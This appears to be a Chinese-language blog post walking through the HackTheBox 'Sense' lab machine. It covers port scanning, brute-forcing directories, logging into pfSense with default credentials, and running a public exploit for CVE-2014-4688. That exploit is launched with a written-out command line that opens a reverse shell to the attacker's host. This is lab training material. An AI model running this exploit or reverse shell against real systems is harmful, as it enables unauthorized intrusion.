HackTheBox-Linux-Sense

  • A+
所属分类:安全文章

一个每日分享渗透小技巧的公众号HackTheBox-Linux-Sense



大家好,这里是 大余安全 的第 118 篇文章,本公众号会每日分享攻防渗透技术给大家。


HackTheBox-Linux-Sense

靶机地址:https://www.hackthebox.eu/home/machines/profile/111

靶机难度:初级(2.8/10)

靶机发布日期:2017年10月22日

靶机描述:

Sense, while not requiring many steps to complete, can be challenging for some as the proof of concept exploit that is publicly available is very unreliable. An alternate method using the same vulnerability is required to successfully gain access.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

HackTheBox-Linux-Sense



一、信息收集

HackTheBox-Linux-Sense

可以看到靶机的IP是10.10.10.60....

HackTheBox-Linux-Sense

Nmap发现仅开放了80和443端口...

HackTheBox-Linux-Sense

访问80跳转到了443....是个sense框架服务页面...需要知道账号密码...爆破看看

HackTheBox-Linux-Sense

通过爆破发现了两个重要的txt文件...

HackTheBox-Linux-Sense

文本信息提示已修补3个漏洞中的2个...有EXP可以利用...

HackTheBox-Linux-Sense

给出了用户名...

HackTheBox-Linux-Sense

通过简单搜索到了默认密码...

HackTheBox-Linux-Sense

利用默认密码成功登陆...框架运行着pfsense 2.1.3-RELEASE....

HackTheBox-Linux-Sense

直接本地搜索,发现了很多漏洞...通过google sense存在的漏洞可利用43560EXP...CVE-2014-4688

HackTheBox-Linux-Sense

查看后发现直接利用即可EXP....不需要修改

HackTheBox-Linux-Sense

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.51 --lport 6666 --username rohit --password pfsense

执行EXP成功获得了反向外壳...获得了user_flag和root_flag信息.....


HackTheBox-Linux-Sense

这里也可以利用39709注入命令提权...可以尝试下


由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

HackTheBox-Linux-Sense



如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-Linux-Sense
HackTheBox-Linux-Sense


HackTheBox-Linux-Sense


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-Linux-Sense

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-Linux-Sense




本文始发于微信公众号(大余安全):HackTheBox-Linux-Sense

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: